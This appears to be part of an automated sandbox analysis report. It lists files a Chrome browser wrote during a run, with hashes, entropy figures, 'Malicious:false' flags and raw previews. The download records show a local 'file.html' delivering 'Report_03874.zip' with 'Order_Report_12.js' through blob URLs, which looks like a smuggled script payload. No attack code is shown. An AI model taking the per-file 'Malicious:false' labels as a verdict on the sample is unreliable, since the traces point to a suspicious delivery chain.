                                                                                                                                                                SHA-256:E8D3C8084404E89F437F276D64104A5ED6D3E7E806FACE55CF9137A07BEF7E1B
                                                                                                                                                                SHA-512:93389C0411CBDD1A4839E41DEC29DA9CDFDF103E1DAFACED12B3DA7B1914A47F7145DDBA29997144B1AD14F7D912CA7074827019CB4EC18A1AC0049FF68900B6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13273639830735874","alternate_error_pages":{"backup":true},"autocomplete":{"retention_policy_last_version":92},"autofill":{"orphan_rows_removed":true},"browser":{"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"this_week_number":2693,"this_week_services_downstream_foreground_kb":{"115188287":27,"125522256":1,"21145003":1051,"35565745":1,"5151071":1}},"default_apps_install_state":2,"domain_diversity":{"last_reporting_timestamp":"13273639830733889"},"download":{"directory_upgrade":true},"extensions":{"alerts":{"initialized":true},"chrome_url_overrides":{},"last_chrome_version":"92.0.4515.107"},"gaia_cookie":{"changed_time":1629166234.486642,"hash":"2jmj7l5rSw0yVb/vlWAYkK/YBwk=","last_list_accounts_data":"[\"gaia.l.a.r\",[]]"},"gcm":{"product_category_for_
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                Entropy (8bit):0.814394910915397
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:TLyFErbXaFpEO5bNmISHnCWm06UwcQ5n5fBfQZllr1bZQmsX3qqDy:TeFErLOpEO5J/Knvm7U1QpB4ZPXQ3q1
                                                                                                                                                                MD5:58A2CB8A1372A56A58FFA2BEF382A06B
                                                                                                                                                                SHA1:D455995F8373F20DD6980358C348D11D3A25946D
                                                                                                                                                                SHA-256:54A77DDC035D6550719BEE8FFF6AA00DA2F7ACDB10B3F0DCB0B84A46C58B869A
                                                                                                                                                                SHA-512:6F900EDEA7F32C4F85622F5FD854B4FB1ABB494330EC637E557EEA17918CC0B3AEF02C4B7695F6558C0293D5281CB9A91CF94584EA776A175A450811A7DA811D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................O}.........g.....8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DownloadMetadata.. (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PDP-11 pure executable not stripped - version 110
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):568
                                                                                                                                                                Entropy (8bit):6.145403243894182
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:2vLOBwZDHVOBGJBVzu7xwDwZobAiUBVz7iPBVzJP:2pZ7LJ/zu7o4oby/z7S/zd
                                                                                                                                                                MD5:146B5BEAA4E5CF1AC630DCD71D25C41B
                                                                                                                                                                SHA1:6E4055716544A8B8312CDA96EE4EAFDDC46ECF3C
                                                                                                                                                                SHA-256:A9828D42F74D9959FBEDE9E6F0BF7A97367EC03789317BE51E9ED4A083D5BB1C
                                                                                                                                                                SHA-512:02168217291C6AA72194452CAFD4AF6E29E29BD4C12620CAB07D86BC9F9F635358EB8227D0F144D78061529A49D69A88776F602D2EBE274AFD9686E5DC43A0F7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ..........blob:null/a97e8999-2326-461e-9e14-63430d44f79c.". .2.=.'.u.....@Y..yD..`.vC.4..[....."4..blob:null/a97e8999-2326-461e-9e14-63430d44f79c.."."..*file:///C:/Users/user/Desktop/file.html..*.0.J.Report_03874.zipP.Z.en-US.....@..Order_Report_12.js...". ..B........o.$'.A.d..L....xR.U .8.@........(.0.8.@................blob:null/a97e8999-2326-461e-9e14-63430d44f79c.."*file:///C:/Users/user/Desktop/file.html0.9......wBB0..blob:null/a97e8999-2326-461e-9e14-63430d44f79c..?.*file:///C:/Users/user/Desktop/file.html..".0.9......wBP.X...................../
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DownloadMetadataTM (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):680
                                                                                                                                                                Entropy (8bit):6.098219793807082
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:wPDdYZDHVO5PDMJBVzuEu7xwDwZobUPDlBVztnePDYMJBVzeqBVzDBVzu+Nm:wbdYZ7KbMJ/zuh7o4obUbl/zVebhJ/zE
                                                                                                                                                                MD5:86101CF5F599E51247715E7C293FA942
                                                                                                                                                                SHA1:9CB75E8D675264F35D447E4008457987BB756903
                                                                                                                                                                SHA-256:8584D978FD02B4E33526B555585C6E2071F637FD04A0D4A0A35418803F901E81
                                                                                                                                                                SHA-512:3EA98F3741F0BEE3057BD54118F68E355D5A0D0C4DE4AC6F289FE2F5CE8FA6DC0DD52279D3351DEECC94BBBBCD0C28B55F24BD4D5864ED767D7D4713918DADDE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ..........blob:null/369ab1ab-090c-4863-8d32-ab64f6ec9cb8.". .2.=.'.u.....@Y..yD..`.vC.4..[....."4..blob:null/369ab1ab-090c-4863-8d32-ab64f6ec9cb8.."."..*file:///C:/Users/user/Desktop/file.html..*.0.J.Report_03874 (1).zipP.Z.en-US.....@..Order_Report_12.js...". ..B........o.$'.A.d..L....xR.U .8.@........(.0.8.@................blob:null/369ab1ab-090c-4863-8d32-ab64f6ec9cb8.."*file:///C:/Users/user/Desktop/file.html0.9..T...wBB0..blob:null/369ab1ab-090c-4863-8d32-ab64f6ec9cb8..i.*file:///C:/Users/user/Desktop/file.html.."*file:///C:/Users/user/Desktop/file.html0.9..J...wBP.X...?.*file:///C:/Users/user/Desktop/file.html..".0.9......wBP.X..................../
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):297
                                                                                                                                                                Entropy (8bit):3.669730444346079
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXayz/t2Hmwg0EOZL7Ao4uhFkp:qTCTCTCTCTCTCTCT5z/t2qoEwhXeLKB
                                                                                                                                                                MD5:2A48F6DFAA57A9E17C611E8AF6152F1D
                                                                                                                                                                SHA1:DAD266E3A4C581ABDB7AF1B7EDB1C14B17DC4D13
                                                                                                                                                                SHA-256:624F373D66613F80EB99E4377ACAF4A6F3860EABA3A3D2A910698EA00F48775D
                                                                                                                                                                SHA-512:AE0AFCDBDDF665C75AE40A3A8A395256FD4F2908B69953956AB839BAB7C3FFD1B8996E90C9B9D0BAB35A55DD342375C8F710FA1708945C9CF918A07BAFEC005F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................i.Wd...............Sgdaefkejpgkiemlaofpalmlakkmbjdnl.declarative_rules.declarativeContent.onPageChanged.[]..F..................F................
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):324
                                                                                                                                                                Entropy (8bit):5.215620167821546
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+oYVq2PlLN23iKKdK8aPrqIFUtpvomgZmwPvomIkwOlLN23iKKdK8amLJ:wAvy5KkL3FUtpg7/PgR5L5KkQJ
                                                                                                                                                                MD5:315715B62CFD985D9B7A06526D074548
                                                                                                                                                                SHA1:E42ECCD26CAA203C90534E89CBB92ECD1B1FE2B1
                                                                                                                                                                SHA-256:414F5B6D58AD9CB699F49B9760BBD2E98FCEE81FA816BDBDF9C2F4E5A2070DF8
                                                                                                                                                                SHA-512:77D093E16F2F95ECC37172E1226974BE2EFBCB4B1CF1766C676CC645742B8A1A754804332C1578027F0ADFEA1A0AC88E3F605610758747420344FF3357831988
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:30.732 1d94 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/MANIFEST-000001.2021/08/16-19:10:30.734 1d94 Recovering log #3.2021/08/16-19:10:30.734 1d94 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG.oldl- (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):324
                                                                                                                                                                Entropy (8bit):5.215620167821546
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+oYVq2PlLN23iKKdK8aPrqIFUtpvomgZmwPvomIkwOlLN23iKKdK8amLJ:wAvy5KkL3FUtpg7/PgR5L5KkQJ
                                                                                                                                                                MD5:315715B62CFD985D9B7A06526D074548
                                                                                                                                                                SHA1:E42ECCD26CAA203C90534E89CBB92ECD1B1FE2B1
                                                                                                                                                                SHA-256:414F5B6D58AD9CB699F49B9760BBD2E98FCEE81FA816BDBDF9C2F4E5A2070DF8
                                                                                                                                                                SHA-512:77D093E16F2F95ECC37172E1226974BE2EFBCB4B1CF1766C676CC645742B8A1A754804332C1578027F0ADFEA1A0AC88E3F605610758747420344FF3357831988
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:30.732 1d94 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/MANIFEST-000001.2021/08/16-19:10:30.734 1d94 Recovering log #3.2021/08/16-19:10:30.734 1d94 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1254
                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):324
                                                                                                                                                                Entropy (8bit):5.203545179149585
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+o4FUJq2PlLN23iKKdK8NIFUtpvoxZmwPvoWSPkwOlLN23iKKdK8+eLJ:w4uJvy5KkpFUtpgx/PgWSP5L5KkqJ
                                                                                                                                                                MD5:557F7826A7D364DD122FC2CF58863D49
                                                                                                                                                                SHA1:1AC796E007983F42FF2A8D2B5EAFF330E055C7EA
                                                                                                                                                                SHA-256:27C893D1AB7624FC1AFAFE7B4222E9028B98F7C7727551C7A4B905FEAA426654
                                                                                                                                                                SHA-512:473DF312DB55D65C6992D7FFB5CFD4CBC0F9FA75A7BA19FEE50D6DAB916F9D79E243C65F13BA6F8D9FBD0CE46F6405AAAE28FB223470BD1436769218A1712C36
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:30.902 1d74 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/MANIFEST-000001.2021/08/16-19:10:30.903 1d74 Recovering log #3.2021/08/16-19:10:30.905 1d74 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.oldTM (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):324
                                                                                                                                                                Entropy (8bit):5.203545179149585
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+o4FUJq2PlLN23iKKdK8NIFUtpvoxZmwPvoWSPkwOlLN23iKKdK8+eLJ:w4uJvy5KkpFUtpgx/PgWSP5L5KkqJ
                                                                                                                                                                MD5:557F7826A7D364DD122FC2CF58863D49
                                                                                                                                                                SHA1:1AC796E007983F42FF2A8D2B5EAFF330E055C7EA
                                                                                                                                                                SHA-256:27C893D1AB7624FC1AFAFE7B4222E9028B98F7C7727551C7A4B905FEAA426654
                                                                                                                                                                SHA-512:473DF312DB55D65C6992D7FFB5CFD4CBC0F9FA75A7BA19FEE50D6DAB916F9D79E243C65F13BA6F8D9FBD0CE46F6405AAAE28FB223470BD1436769218A1712C36
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:30.902 1d74 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/MANIFEST-000001.2021/08/16-19:10:30.903 1d74 Recovering log #3.2021/08/16-19:10:30.905 1d74 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_1\_metadata\computed_hashes.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):11336
                                                                                                                                                                Entropy (8bit):6.0707244876366575
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:AbylJnlTwGB7V9Hne4qasKxXItmLG48gcLg/PkI:Ab+nldByaFx4toj8VEPT
                                                                                                                                                                MD5:2E2110A99AD3AE9721A458C95C64C868
                                                                                                                                                                SHA1:72AE17599EDC0B2DC61C41D946E3E296864F2CBA
                                                                                                                                                                SHA-256:BB46BA705D5F6F43F66B07EA5DA4CC7CC0BF8FE635CCC4EBBA30A5D4A54158DE
                                                                                                                                                                SHA-512:29D95D043F3E529DD33F73B3207A9167D479D9FC404209497B53229CF68AA634CB8A1FE3FD08512FD7F48AFB567144DB873FBBDAD8171D42968B97357F06BC1E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"file_hashes":[{"block_hashes":["8D+nOE33nrpuAnTVcJlgMPWVo79reBkp3Z22WTJi5B8="],"block_size":4096,"path":"_locales/nb/messages.json"},{"block_hashes":["A+1PYW3V6CJbBuQ7aqrgYhyH3bT8PKyBXp3hN2slpI0=","WSOpQRkYTHjPSlG9Zif2a7TNhy43NDcG1Zg5Nv0UbH0=","jDctR8ImG5KZrQKm4kDjUB7FokSJfjo/pmvFowRVlaY=","LPxhhJiuU0lprt0T6flpS7TkaDg7MocrbmzO65xH6RI=","nZ9zLb2By96AkKXALRM+C0Eu11XUjPiMXEKjiCPdtHE=","wifibc1QfMBN2jrtUtLgsCefvuceTpAatmLvul11RJA=","dHjWlSIIdjj7MWqg3T8MG58RuuqRXk32vqi/13JqEgA=","zd3DV7dbvfNvx1hdhU01fW5ily52DLN0CFL/ADaEeTI=","DpjXcO85FFFY9KJFPkGNfFUtdQIOsGwO5jUckiUwY14=","gqid6l1+mk/6yWgUECRofI9lMipXgXh2jEN2+CxmPE0=","prDB91X2Mmfg/M/txVMITWBmEGbOGjqBTP7CMjYqdHs=","yLPAqV4gqoyS/zFkEt3Cn2j0q2v9QOSthVFfWn8EzCM=","EPQ3jzdrLkAHyvf3920B5Y3aAkO1IJdn/UtbnAmq6T0=","+oOc6ca+ChKUpTu+oa2ZRxRE+wG3QJmuYWEvYCs40NI=","3mBGNAiRlTANEQkqzU3TEi+5wJ0ubR5uwtS4/9OOM7w=","1A9NNawxuhu95H5eThvf1rewJ4QQWhhPNxJXO1C/n68=","E3vWLQxzmj+e5QxYbUscllJ5n0ITpw5JBHV1Kph3/KM=","i3I8ghdTF9c1ZXNBZmvsID+DV4gxBVN27rj9wsMtRpg=","R
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\9221.427.0.1_0\_metadata\computed_hashes.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):26178
                                                                                                                                                                Entropy (8bit):6.060546316291638
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:0kHklriTcXkIqE4Cq022fehEH/TdMKGRlhKlkIALQgtTrs8bMJ/1IM6vvSi3hJnz:0kE1i4kIlg2Wi5GRSkIhqWy1vnJ3GOHJ
                                                                                                                                                                MD5:E7FC5462366916AA507D0D350BF1BE86
                                                                                                                                                                SHA1:0D250D97A4FAA070DCE2BE246F14656800EE6561
                                                                                                                                                                SHA-256:84F230EAF1D18C25F8336F3ADEB490847D2ABFF6D4B30E7744C0D2B5790F84F6
                                                                                                                                                                SHA-512:F07D080196055AAD3AF5F0231C05AE6EF54FFA4C035775C7CE32B0A57EF254A79A05FB7ACED60D3F0F5A785C6846E675949F99161C32F81B977EB25ABEFAAB18
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"file_hashes":[{"block_hashes":["DOZdV3jFvk12AM2JNDYKo3KZrIVRprmJ+sVGWkqqE4Q=","rVElW3Hu3T52SzDDUqGT5YiJTBGUv2h3pNuBKFlhZ1U=","X/3fg4KZxgQ1jBr5QGq0F5JnflgE27UErd88mrxTcxs=","VibLbpy0ig+5INMOU71fTYN76iaka2XVpmm1qAKYsX8=","EChCwCbQHbHQ7oDdGT2qNyiRJ0yck2YC2emNGq4whtE="],"block_size":4096,"path":"_locales/iw/messages.json"},{"block_hashes":["fM6wUoU96QmdAMMJqhyPQdILY6QXE2cfpXivMNd/kSg=","GmZUfDhlvU+1ByKQxZIcQZm+8bSFENyNk79q9fsZu3o=","X0hU8nolnxRmTiwIKtHtUeSjEP4YaSRtnpXvJQrqg8I="],"block_size":4096,"path":"_locales/nb/messages.json"},{"block_hashes":["/0XLYLvR7GDi1lXEsqI5OOorLaHGVkQU9sW9wrxd/qs=","ugdSYfR9jET/5OpIYWZUycWy9FcBX/jb/7/hmW5DVR0=","Z2vShQRg9avHHQwTkYjAyfnFnhHQ6Ce+ob00hRV0V2Q=","lIb7yaoAR7pQ0ZDpBU1ZzIKa+hURf3edJBILNvUO6lk=","5mpQSSRBXvBC9O0QpFoDxFGOcDS5Iua0gICy3D+t0UM=","EkWgzDTb1zblDgz7APE/G19fsHn/TJJuw3JbNsqGNCY=","Mb/n/cgw5oibXHqBfMwXremke8GY9oWJPhuY1Y2CrpQ=","cb+9vKl/3iDYu97Gc5yEsJnJ2QWd4dpd1E3pt/3yaqQ=","17+40sjnss/mFRm6idVmlEZTl+kWrR1GSzedHRD8yZI=","fTKSj8L49Jxlk/4helP5XYq
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):334
                                                                                                                                                                Entropy (8bit):5.235760982564769
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+oGj+L+q2PlLN23iKKdKWT5g1IdqIFUtpvoGH11ZmwPvoGHjLVkwOlLN23iKKd6:wvL+vy5Kkg5gSRFUtpgWX/PgWjLV5L5N
                                                                                                                                                                MD5:1AB12A2813537D045E008AF734F304FD
                                                                                                                                                                SHA1:388DF5EDD8E8FED12F307643349D34D38A18DF90
                                                                                                                                                                SHA-256:DAF82AB122C21B3E3E3CEAACD41615A03ADC35E1BC75734A8EF58587976140FB
                                                                                                                                                                SHA-512:BBEE8FC2F0289DF518FFBD7D2829877B77E552D4FE1130867225FE80920966BB2A534CF86DF51C288CE4059983B0DBE94759599BE55CAC19D1F23DD6C187D943
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:34.291 1c7c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/MANIFEST-000001.2021/08/16-19:10:34.292 1c7c Recovering log #3.2021/08/16-19:10:34.292 1c7c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG.oldG (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):334
                                                                                                                                                                Entropy (8bit):5.235760982564769
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+oGj+L+q2PlLN23iKKdKWT5g1IdqIFUtpvoGH11ZmwPvoGHjLVkwOlLN23iKKd6:wvL+vy5Kkg5gSRFUtpgWX/PgWjLV5L5N
                                                                                                                                                                MD5:1AB12A2813537D045E008AF734F304FD
                                                                                                                                                                SHA1:388DF5EDD8E8FED12F307643349D34D38A18DF90
                                                                                                                                                                SHA-256:DAF82AB122C21B3E3E3CEAACD41615A03ADC35E1BC75734A8EF58587976140FB
                                                                                                                                                                SHA-512:BBEE8FC2F0289DF518FFBD7D2829877B77E552D4FE1130867225FE80920966BB2A534CF86DF51C288CE4059983B0DBE94759599BE55CAC19D1F23DD6C187D943
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:34.291 1c7c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/MANIFEST-000001.2021/08/16-19:10:34.292 1c7c Recovering log #3.2021/08/16-19:10:34.292 1c7c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:MS Windows icon resource - 13 icons, 8x8, 32 bits/pixel, 10x10, 32 bits/pixel
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):181072
                                                                                                                                                                Entropy (8bit):5.774426487043815
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:avbYFOZyYb37psk2SVlfN/qskVMxoZ51+XBY95/E5cCDd4QAOXxfzUBn2Y2l3P:a8Y7wqFTkVMO51+XBY96Nd4ByVuV2l3P
                                                                                                                                                                MD5:1B40AC9ABB964672109D49ABFCFE2717
                                                                                                                                                                SHA1:966E224F2887075825D42D2E7E0063BFAA81A99C
                                                                                                                                                                SHA-256:503149B1B47F8296DEDB800251DBD9AF614856F0D7E6AB1C03DBC90EBCE53674
                                                                                                                                                                SHA-512:00B50E49CAFD8246102BB460C7B96C20B50A2DDCB48A64C40D65901B517A2698DB9C5AA5EC7F143314DDB8D74624377F12A95C7F4D9FCE206473E8BBF126388B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ............ .H............. ............... .p............. .h...n......... ............... ......... .... .....n...((.... .h.......00.... ..%..~H..@@.... .(B..&n..``.... .....N......... .(....D........ .2v...M..(............. .................................]..X\.).H...>..Z............\..._...V...F...A...A.......^..Wb...f.)...l...v.M...B...@..Wc...[.....z...`...J.....9...E...k...R.D.......G...A.....;...E...h..XKd..KW..........D...>...=..X....GQ.JW..;M..8K..@H..=;.............JV.YKV.IT.BS.Y........................................(............. .....................................[..TZ.5.B...@..T................X...]...`...\...K...D...A...;.......3...\...e...V...h.).d.G.<...F...@...3...^..Td...X.....e....v.....:...E...=..T`...d...h.B.....?...;...O...B...A...b.!.g...Ru......9...8...P...C...C...l..U].M.5@..............6...C...@..T....EW..LX..=K..Ob..Me..5R..AX..;V..++......BL..KW..KW..DO..BL..EN..AJ..;1..................HT.UIV.FT.BQ.U..............................
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):126976
                                                                                                                                                                Entropy (8bit):0.5451957136647383
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:BNxVP72KQzPkaf+bDo3irhnymCvVj3XBBE3u:TPpQzPkaQU3iVymCJBBE3u
                                                                                                                                                                MD5:19FF44D335B1812973DCA346147919BD
                                                                                                                                                                SHA1:A34E1C0596DE4A3958CA1EF17CB2E33EE94BB0EB
                                                                                                                                                                SHA-256:C95E6117EC1F7751148A8C189C9C4DBB6DA930B83C7E83FD1F6C2B1F40E72EB5
                                                                                                                                                                SHA-512:8A41FA9E02956A9338F543EC78C12B52EA06189E9B6489DF23E81EA04B3E110776192DD97B315F30768C7AF4BCD11F5B4E5F87293D6741E5F1328B1129D45F95
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Provider Cache
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):444
                                                                                                                                                                Entropy (8bit):5.100226056585388
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:AwB3exxeANghfivRfAsVbBk778B/xgsgdNRBVzy3KJkWGq:Aw0gLs/Y78BJgscL/zmGkWP
                                                                                                                                                                MD5:66F3AFEDD3F974A52AFE00662EB39CE9
                                                                                                                                                                SHA1:BF85638CCDA69D054CEB6ADF2520F6862233EC23
                                                                                                                                                                SHA-256:D09B1C38988E6C243BEBA144CB87F336BF4D7B55FC95B1C66195ACFCAB46FE2B
                                                                                                                                                                SHA-512:A379A91BBFB150636A9A3E04EDFE6FE402D12B401DF1F141D86138203335FFBA87B7CF780B05D311950ED1B35100773154866CDA5CDAA7E076090F8B872A0663
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .........."*....user..c..desktop..file..html..users*B......user......c......desktop......file......html......users..2.........a........c........d.........e...........f.........h........i........k........l..........m........o.........p........r.........s.........t.........u...:8........................................................BR...N...... .......**file:///C:/Users/user/Desktop/file.html2.:...............J..............!&
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):8720
                                                                                                                                                                Entropy (8bit):0.22018035706688846
                                                                                                                                                                Encrypted:false
